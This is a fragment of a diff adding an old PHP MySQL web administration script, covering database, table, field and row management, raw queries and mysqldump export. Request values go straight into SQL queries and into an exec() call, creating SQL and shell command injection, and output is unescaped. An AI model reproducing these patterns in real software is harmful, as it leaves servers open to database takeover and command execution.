+		echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
+		echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname'>Dump</a></td>\n";
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+}
+
+function createDatabase() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	mysql_create_db( $dbname, $mysqlHandle );
+	listDatabases();
+}
+
+function dropDatabase() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	mysql_drop_db( $dbname, $mysqlHandle );
+	listDatabases();
+}
+
+function listTables() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	echo "<h1>Table List</h1>\n";
+	echo "<p class=location>$dbname</p>\n";
+	echoQueryResult();
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=createTable>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=text name=tablename>\n";
+	echo "<input type=submit value='Create Table'>\n";
+	echo "</form>\n";
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=query>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=text size=40 name=queryStr>\n";
+	//echo "<textarea cols=30 rows=3 name=queryStr></textarea><br>";
+	echo "<input type=submit value='Query'>\n";
+	echo "</form>\n";
+	echo "<hr>\n";
+
+	$pTable = mysql_list_tables( $dbname );
+
+	if( $pTable == 0 ) {
+		$msg  = mysql_error();
+		echo "<h3>Error : $msg</h3><p>\n";
+		return;
+	}
+	$num = mysql_num_rows( $pTable );
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$tablename = mysql_tablename( $pTable, $i );
+
+		echo "<tr>\n";
+		echo "<td>\n";
+		echo "$tablename\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n";
+		echo "</td>\n";
+		echo "</tr>\n";
+	}
+
+	echo "</table>";
+}
+
+function createTable() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+	$queryStr = "CREATE TABLE $tablename ( no INT )";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	listTables();
+}
+
+function dropTable() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+	$queryStr = "DROP TABLE $tablename";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	listTables();
+}
+
+function viewSchema() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+	echo "<h1>Table Schema</h1>\n";
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+	echoQueryResult();
+
+	echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
+	echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
+	echo "<hr>\n";
+
+	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+	$num = mysql_num_rows( $pResult );
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+	echo "<tr>\n";
+	echo "<th>Field</th>\n";
+	echo "<th>Type</th>\n";
+	echo "<th>Null</th>\n";
+	echo "<th>Key</th>\n";
+	echo "<th>Default</th>\n";
+	echo "<th>Extra</th>\n";
+	echo "<th colspan=2>Action</th>\n";
+	echo "</tr>\n";
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_array( $pResult );
+		echo "<tr>\n";
+		echo "<td>".$field["Field"]."</td>\n";
+		echo "<td>".$field["Type"]."</td>\n";
+		echo "<td>".$field["Null"]."</td>\n";
+		echo "<td>".$field["Key"]."</td>\n";
+		echo "<td>".$field["Default"]."</td>\n";
+		echo "<td>".$field["Extra"]."</td>\n";
+		$fieldname = $field["Field"];
+		echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
+		echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+}
+
+function manageField( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;
+
+	if( $cmd == "add" )
+		echo "<h1>Add Field</h1>\n";
+	else if( $cmd == "edit" ) {
+		echo "<h1>Edit Field</h1>\n";
+		$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+		$num = mysql_num_rows( $pResult );
+		for( $i = 0; $i < $num; $i++ ) {
+			$field = mysql_fetch_array( $pResult );
+			if( $field["Field"] == $fieldname ) {
+				$fieldtype = $field["Type"];
+				$fieldkey = $field["Key"];
+				$fieldextra = $field["Extra"];
+				$fieldnull = $field["Null"];
+				$fielddefault = $field["Default"];
+				break;
+			}
+		}
+		$type = strtok( $fieldtype, " (,)\n" );
+		if( strpos( $fieldtype, "(" ) ) {
+			if( $type == "enum" | $type == "set" ) {
+				$valuelist = strtok( " ()\n" );
+			} else {
+				$M = strtok( " (,)\n" );
+				if( strpos( $fieldtype, "," ) )
+					$D = strtok( " (,)\n" );
+			}
+		}
+	}
+
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+	echo "<form action=$PHP_SELF>\n";
+
+	if( $cmd == "add" )
+		echo "<input type=hidden name=action value=addField_submit>\n";
+	else if( $cmd == "edit" ) {
+		echo "<input type=hidden name=action value=editField_submit>\n";
+		echo "<input type=hidden name=old_name value=$fieldname>\n";
+	}
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=hidden name=tablename value=$tablename>\n";
+
+	echo "<h3>Name</h3>\n";
+	echo "<input type=text name=name value=$fieldname><p>\n";
+?>
+
+<h3>Type</h3>
+
+<font size=2>
+* `M' indicates the maximum display size.<br>
+* `D' applies to floating-point types and indicates the number of digits following the decimal point.<br>
+</font>
+
+<table>
+<tr>
+<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYINT" <? if( $type == "tinyint" ) echo "checked";?>>TINYINT (-128 ~ 127)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SMALLINT" <? if( $type == "smallint" ) echo "checked";?>>SMALLINT (-32768 ~ 32767)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMINT" <? if( $type == "mediumint" ) echo "checked";?>>MEDIUMINT (-8388608 ~ 8388607)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="INT" <? if( $type == "int" ) echo "checked";?>>INT (-2147483648 ~ 2147483647)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" ) echo "checked";?>>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="FLOAT" <? if( $type == "float" ) echo "checked";?>>FLOAT</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DOUBLE" <? if( $type == "double" ) echo "checked";?>>DOUBLE</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DECIMAL" <? if( $type == "decimal" ) echo "checked";?>>DECIMAL(NUMERIC)</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATE" <? if( $type == "date" ) echo "checked";?>>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATETIME" <? if( $type == "datetime" ) echo "checked";?>>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIMESTAMP" <? if( $type == "timestamp" ) echo "checked";?>>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIME" <? if( $type == "time" ) echo "checked";?>>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) echo "checked";?>>YEAR (1901 ~ 2155, 0000, YYYY)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) echo "checked";?>>CHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="VARCHAR" <? if( $type == "varchar" ) echo "checked";?>>VARCHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYTEXT" <? if( $type == "tinytext" ) echo "checked";?>>TINYTEXT (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) echo "checked";?>>TEXT (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMTEXT" <? if( $type == "mediumtext" ) echo "checked";?>>MEDIUMTEXT (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGTEXT" <? if( $type == "longtext" ) echo "checked";?>>LONGTEXT (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYBLOB" <? if( $type == "tinyblob" ) echo "checked";?>>TINYBLOB (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BLOB" <? if( $type == "blob" ) echo "checked";?>>BLOB (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMBLOB" <? if( $type == "mediumblob" ) echo "checked";?>>MEDIUMBLOB (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGBLOB" <? if( $type == "longblob" ) echo "checked";?>>LONGBLOB (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr> 
+<tr>
+<td><input type=radio name=type value="ENUM" <? if( $type == "enum" ) echo "checked";?>>ENUM</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SET" <? if( $type == "set" ) echo "checked";?>>SET</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+
+</table>
+<table>
+<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: 'apple', 'orange', 'banana') </th></tr>
+<tr>
+<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo "value=$M";?>></td>
+<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo "value=$D";?>></td>
+<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? if( strpos( $fieldtype, "unsigned" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=zerofill value="ZEROFILL" <? if( strpos( $fieldtype, "zerofill" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=binary value="BINARY" <? if( strpos( $fieldtype, "binary" )  ) echo "checked";?>></td>
+<td align=center><input type=text size=60 name=valuelist <? if( $valuelist != "" ) echo "value=\"$valuelist\"";?>></td>
+</tr>
+</table>
+
+
+<h3>Flags</h3>
+<table>
+<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
+<tr>
+<td align=center><input type=checkbox name=not_null value="NOT NULL" <? if( $fieldnull != "YES" ) echo "checked";?>></td>
+<td align=center><input type=text name=default_value <? if( $fielddefault != "" ) echo "value=$fielddefault";?>></td>
+<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" <? if( $fieldextra == "auto_increment" ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" <? if( $fieldkey == "PRI" ) echo "checked";?>></td>
+</tr>
+</table>
+
+<p>
+
+<?
+	if( $cmd == "add" )
+		echo "<input type=submit value='Add Field'>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=submit value='Edit Field'>\n";
+	echo "<input type=button value=Cancel onClick='history.back()'>\n";
+	echo "</form>\n";
+}
+
+function manageField_submit( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg,
+		$M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist;
+
+	if( $cmd == "add" )
+		$queryStr = "ALTER TABLE $tablename ADD $name ";
+	else if( $cmd == "edit" )
+		$queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
+	
+	if( $M != "" )
+		if( $D != "" )
+			$queryStr .= "$type($M,$D) ";
+		else
+			$queryStr .= "$type($M) ";
+	else if( $valuelist != "" ) {
+		$valuelist = stripslashes( $valuelist );
+		$queryStr .= "$type($valuelist) ";
+	} else
+		$queryStr .= "$type ";
+
+	$queryStr .= "$unsigned $zerofill $binary ";
+
+	if( $default_value != "" )
+		$queryStr .= "DEFAULT '$default_value' ";
+	
+	$queryStr .= "$not_null $auto_increment";
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	// key change
+	$keyChange = false;
+	$result = mysql_query( "SHOW KEYS FROM $tablename" );
+	$primary = "";
+	while( $row = mysql_fetch_array($result) )
+		if( $row["Key_name"] == "PRIMARY" ) {
+			if( $row[Column_name] == $name )
+				$keyChange = true;
+			else
+				$primary .= ", $row[Column_name]";
+		}
+	if( $primary_key == "PRIMARY KEY" ) {
+		$primary .= ", $name";
+		$keyChange = !$keyChange;
+	}
+	$primary = substr( $primary, 2 );
+	if( $keyChange == true ) {
+		$q = "ALTER TABLE $tablename DROP PRIMARY KEY";
+		mysql_query( $q );
+		$queryStr .= "<br>\n" . $q;
+		$errMsg .= "<br>\n" . mysql_error();
+		$q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
+		mysql_query( $q );
+		$queryStr .= "<br>\n" . $q;
+		$errMsg .= "<br>\n" . mysql_error();
+	}
+
+	viewSchema();
+}
+
+function dropField() {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+	$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr , $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewSchema();
+}
+
+function viewData( $queryStr ) {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;
+
+	echo "<h1>Data in Table</h1>\n";
+	if( $tablename != "" )
+		echo "<p class=location>$dbname &gt; $tablename</p>\n";
+	else
+		echo "<p class=location>$dbname</p>\n";
+
+	$queryStr = stripslashes( $queryStr );
+	if( $queryStr == "" ) {
+		$queryStr = "SELECT * FROM $tablename";
+		if( $orderby != "" )
+			$queryStr .= " ORDER BY $orderby";
+		echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
+		echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+	}
+
+	$pResult = mysql_db_query( $dbname, $queryStr );
+	$errMsg = mysql_error();
+
+	$GLOBALS[queryStr] = $queryStr;
+
+	if( $pResult == false ) {
+		echoQueryResult();
+		return;
+	}
+	if( $pResult == 1 ) {
+		$errMsg = "Success";
+		echoQueryResult();
+		return;
+	}
+
+	echo "<hr>\n";
+
+	$row = mysql_num_rows( $pResult );
+	$col = mysql_num_fields( $pResult );
+
+	if( $row == 0 ) {
+		echo "No Data Exist!";
+		return;
+	}
+	
+	if( $rowperpage == "" ) $rowperpage = 20;
+	if( $page == "" ) $page = 0;
+	else $page--;
+	mysql_data_seek( $pResult, $page * $rowperpage );
+
+	echo "<table cellspacing=1 cellpadding=2>\n";
+	echo "<tr>\n";
+	for( $i = 0; $i < $col; $i++ ) {
+		$field = mysql_fetch_field( $pResult, $i );
+		echo "<th>";
+		echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
+		echo "</th>\n";
+	}
+	echo "<th colspan=2>Action</th>\n";
+	echo "</tr>\n";
+
+	for( $i = 0; $i < $rowperpage; $i++ ) {
+		$rowArray = mysql_fetch_row( $pResult );
+		if( $rowArray == false ) break;
+		echo "<tr>\n";
+		$key = "";
+		for( $j = 0; $j < $col; $j++ ) {
+			$data = $rowArray[$j];
+
+			$field = mysql_fetch_field( $pResult, $j );
+			if( $field->primary_key == 1 )
+				$key .= "&" . $field->name . "=" . $data;
+
+			if( strlen( $data ) > 20 )
+				$data = substr( $data, 0, 20 ) . "...";
+			$data = htmlspecialchars( $data );
+			echo "<td>\n";
+			echo "$data\n";
+			echo "</td>\n";
+		}
+
+		if( $key == "" )
+			echo "<td colspan=2>no Key</td>\n";
+		else {
+			echo "<td><a href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n";
+			echo "<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablename$key' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
+		}
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+
+	echo "<font size=2>\n";
+	echo "<form action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' method=post>\n";
+	echo "<font color=green>\n";
+	echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
+	echo "</font>\n";
+	echo " | ";
+	if( $page > 0 ) {
+		echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
+		if( $orderby != "" )
+			echo "&orderby=$orderby";
+		echo "'>Prev</a>\n";
+	} else
+		echo "Prev";
+	echo " | ";
+	if( $page < ($row/$rowperpage)-1 ) {
+		echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
+		if( $orderby != "" )
+			echo "&orderby=$orderby";
+		echo "'>Next</a>\n";
+	} else
+		echo "Next";
+	echo " | ";
+	if( $row > $rowperpage ) {
+		echo "<input type=text size=4 name=page>\n";
+		echo "<input type=submit value='Go'>\n";
+	}
+	echo "</form>\n";
+	echo "</font>\n";
+}
+
+function manageData( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF;
+
+	if( $cmd == "add" )
+		echo "<h1>Add Data</h1>\n";
+	else if( $cmd == "edit" ) {
+		echo "<h1>Edit Data</h1>\n";
+		$pResult = mysql_list_fields( $dbname, $tablename );
+		$num = mysql_num_fields( $pResult );
+	
+		$key = "";
+		for( $i = 0; $i < $num; $i++ ) {
+			$field = mysql_fetch_field( $pResult, $i );
+			if( $field->primary_key == 1 )
+				if( $field->numeric == 1 )
+					$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+				else
+					$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+		}
+		$key = substr( $key, 0, strlen($key)-4 );
+
+		mysql_select_db( $dbname, $mysqlHandle );
+		$pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
+		$data = mysql_fetch_array( $pResult );
+	}
+
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+	echo "<form action='$PHP_SELF' method=post>\n";
+	if( $cmd == "add" )
+		echo "<input type=hidden name=action value=addData_submit>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=hidden name=action value=editData_submit>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=hidden name=tablename value=$tablename>\n";
+	echo "<table cellspacing=1 cellpadding=2>\n";
+	echo "<tr>\n";
+	echo "<th>Name</th>\n";
+	echo "<th>Type</th>\n";
+	echo "<th>Function</th>\n";
+	echo "<th>Data</th>\n";
+	echo "</tr>\n";
+
+	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+	$num = mysql_num_rows( $pResult );
+
+	$pResultLen = mysql_list_fields( $dbname, $tablename );
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_array( $pResult );
+		$fieldname = $field["Field"];
+		$fieldtype = $field["Type"];
+		$len = mysql_field_len( $pResultLen, $i );
+
+		echo "<tr>";
+		echo "<td>$fieldname</td>";
+		echo "<td>".$field["Type"]."</td>";
+		echo "<td>\n";
+		echo "<select name=${fieldname}_function>\n";
+		echo "<option>\n";
+		echo "<option>ASCII\n";
+		echo "<option>CHAR\n";
+		echo "<option>SOUNDEX\n";
+		echo "<option>CURDATE\n";
+		echo "<option>CURTIME\n";
+		echo "<option>FROM_DAYS\n";
+		echo "<option>FROM_UNIXTIME\n";
+		echo "<option>NOW\n";
+		echo "<option>PASSWORD\n";
+		echo "<option>PERIOD_ADD\n";
+		echo "<option>PERIOD_DIFF\n";
+		echo "<option>TO_DAYS\n";
+		echo "<option>USER\n";
+		echo "<option>WEEKDAY\n";
+		echo "<option>RAND\n";
+		echo "</select>\n";
+		echo "</td>\n";
+		$value = htmlspecialchars($data[$i]);
+		if( $cmd == "add" ) {
+			$type = strtok( $fieldtype, " (,)\n" );
+			if( $type == "enum" || $type == "set" ) {
+				echo "<td>\n";
+				if( $type == "enum" )
+					echo "<select name=$fieldname>\n";
+				else if( $type == "set" )
+					echo "<select name=$fieldname size=4 multiple>\n";
+				echo strtok( "'" );
+				while( $str = strtok( "'" ) ) {
+					echo "<option>$str\n";
+					strtok( "'" );
+				}
+				echo "</select>\n";
+				echo "</td>\n";
+			} else {
+				if( $len < 40 )
+					echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
+				else
+					echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
+			}
+		} else if( $cmd == "edit" ) {
+			$type = strtok( $fieldtype, " (,)\n" );
+			if( $type == "enum" || $type == "set" ) {
+				echo "<td>\n";
+				if( $type == "enum" )
+					echo "<select name=$fieldname>\n";
+				else if( $type == "set" )
+					echo "<select name=$fieldname size=4 multiple>\n";
+				echo strtok( "'" );
+				while( $str = strtok( "'" ) ) {
+					if( $value == $str )
+						echo "<option selected>$str\n";
+					else
+						echo "<option>$str\n";
+					strtok( "'" );
+				}
+				echo "</select>\n";
+				echo "</td>\n";
+			} else {
+				if( $len < 40 )
+					echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
+				else
+					echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
+			}
+		}
+		echo "</tr>";
+	}
+	echo "</table><p>\n";
+	if( $cmd == "add" )
+		echo "<input type=submit value='Add Data'>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=submit value='Edit Data'>\n";
+	echo "<input type=button value='Cancel' onClick='history.back()'>\n";
+	echo "</form>\n";
+}
+
+function manageData_submit( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+	$pResult = mysql_list_fields( $dbname, $tablename );
+	$num = mysql_num_fields( $pResult );
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	if( $cmd == "add" )
+		$queryStr = "INSERT INTO $tablename VALUES (";
+	else if( $cmd == "edit" )
+		$queryStr = "REPLACE INTO $tablename VALUES (";
+	for( $i = 0; $i < $num-1; $i++ ) {
+		$field = mysql_fetch_field( $pResult );
+		$func = $GLOBALS[$field->name."_function"];
+		if( $func != "" )
+			$queryStr .= " $func(";
+		if( $field->numeric == 1 ) {
+			$queryStr .= $GLOBALS[$field->name];
+			if( $func != "" )
+				$queryStr .= "),";
+			else
+				$queryStr .= ",";
+		} else {
+			$queryStr .= "'" . $GLOBALS[$field->name];
+			if( $func != "" )
+				$queryStr .= "'),";
+			else
+				$queryStr .= "',";
+		}
+	}
+	$field = mysql_fetch_field( $pResult );
+	if( $field->numeric == 1 )
+		$queryStr .= $GLOBALS[$field->name] . ")";
+	else 
+		$queryStr .= "'" . $GLOBALS[$field->name] . "')";
+
+	mysql_query( $queryStr , $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewData( "" );
+}
+
+function deleteData() {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+	$pResult = mysql_list_fields( $dbname, $tablename );
+	$num = mysql_num_fields( $pResult );
+
+	$key = "";
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_field( $pResult, $i );
+		if( $field->primary_key == 1 )
+			if( $field->numeric == 1 )
+				$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+			else
+				$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+	}
+	$key = substr( $key, 0, strlen($key)-4 );
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	$queryStr =  "DELETE FROM $tablename WHERE $key";
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewData( "" );
+}
+
+function dump() {
+	global $PHP_SELF, $USERNAME, $PASSWORD, $action, $dbname, $tablename;
+
+	if( $action == "dumpTable" )
+		$filename = $tablename;
+	else
+		$filename = $dbname;
+
+	header("Content-disposition: filename=$filename.sql");
+	header("Content-type: application/octetstream");
+	header("Pragma: no-cache");
+	header("Expires: 0");
+
+	$pResult = mysql_query( "show variables" );
+	while( 1 ) {
+		$rowArray = mysql_fetch_row( $pResult );
+		if( $rowArray == false ) break;
+		if( $rowArray[0] == "basedir" )
+			$bindir = $rowArray[1]."bin/";
+	}
+
+	exec( $bindir."mysqldump --user=$USERNAME --password=$PASSWORD $dbname $tablename" );
+}
+
+function utils() {
+	global $PHP_SELF, $command;
+	echo "<h1>Utilities</h1>\n";
+	if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
+		echo "<hr>\n";
+		echo "Show\n";
+		echo "<ul>\n";
+		echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
+		echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
+		echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
+		echo "</ul>\n";
+		echo "Flush\n";
+		echo "<ul>\n";
+		echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
+		if( $command == "flush_hosts" ) {
+			if( mysql_query( "Flush hosts" ) != false )
